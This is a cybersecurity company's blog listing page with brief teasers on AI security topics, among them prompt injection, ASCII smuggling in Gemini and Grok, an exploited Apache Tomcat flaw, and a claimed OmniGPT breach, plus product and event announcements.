You'll find useful content about AI security, the cybersecurity landscape, news, events and much more updated regularly here.
Researcher Viktor Markopoulos discovers ASCII Smuggling bypasses human audit via Unicode, enabling enterprise identity spoofing and data poisoning on Gemini & Grok.
If you prefer to be notified of new posts via email, simply subscribe to our blog below.
FireTail’s latest platform update gives customers expanded AI security features and discovery capabilities to better find, document and protect AI initiatives across your organization. Here, we look at what the update covers and the benefits these new features deliver for FireTail customers.
In this blog, we are taking a closer look at Prompt Injection, the #1 vulnerability on the OWASP Top 10 list of LLM risks in 2025. Join us in the first of this 10-part series as we examine the root causes of prompt injection, how prompt injection attacks are carried out, and the best methods to avoid them.
FireTail has been selected as a finalist for the Blackhat Asia 2025 Startup Spotlight Competition. We're delighted to be taking part and can't wait to showcase how FireTail helps enterprises discover, assess, and secure AI usage while preventing threats like shadow AI, data leaks, and AI-specific attacks.
Researchers recently found a vulnerability in Apache Tomcat’s servers that would allow an attacker to commit Remote Code Execution with a single PUT request to a specific API, followed by a GET. And now, this vulnerability is officially being exploited in the wild.
Security teams today face a dual challenge: protecting AI systems from external threats while securing the APIs that power them. The reality is clear—if your APIs aren’t secure, neither is your AI.
A BreachForum user came out claiming to have breached OmniGPT and shared samples of stolen data to back up this claim. Weeks later, researchers are still scrambling to figure out the scope, attack method, and more.